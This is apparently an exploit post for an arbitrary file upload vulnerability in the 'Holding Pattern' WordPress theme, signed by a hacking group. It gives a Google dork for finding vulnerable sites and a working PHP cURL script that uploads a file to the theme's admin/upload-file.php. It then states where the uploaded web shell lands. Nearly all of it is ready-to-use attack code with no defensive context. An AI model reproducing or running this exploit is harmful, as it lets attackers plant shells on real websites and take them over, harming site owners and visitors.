Assalamuallaikum Wr.Wb
- PriaPolos Here !!
- # Exploit Title: Wordpress Theme Holding Pattern Arbitrary File Upload Vulnerability
- # Source: https://github.com/heyjoeb/fenix/tree/master/wp-content/themes/holding_pattern
- # Author: terrorist
- # Email: mrinjector17@gmail.com
- # Team: GHC - Georgian Hacking Community
- # Category: webapps/php
- # Google dork: inurl:wp-content/themes/holding_pattern
<?php
$uploadfile="PriaPolos.php";
$target = "http://target.com";
$domain = explode("/", $target);
$server_addr = gethostbyname($domain[2]);
$ch = curl_init($target."/wp-content/themes/holding_pattern/admin/upload-file.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_VERBOSE, false);
curl_setopt($ch, CURLOPT_POSTFIELDS,array(md5($server_addr)=>"@$uploadfile",'upload_path'=>base64_encode('.')));
curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Shell Location :
http://site.com/wp-content/themes/holding_pattern/admin/NameYourShell.php
Credits :
Faizal Affandy | Extreme Crew |
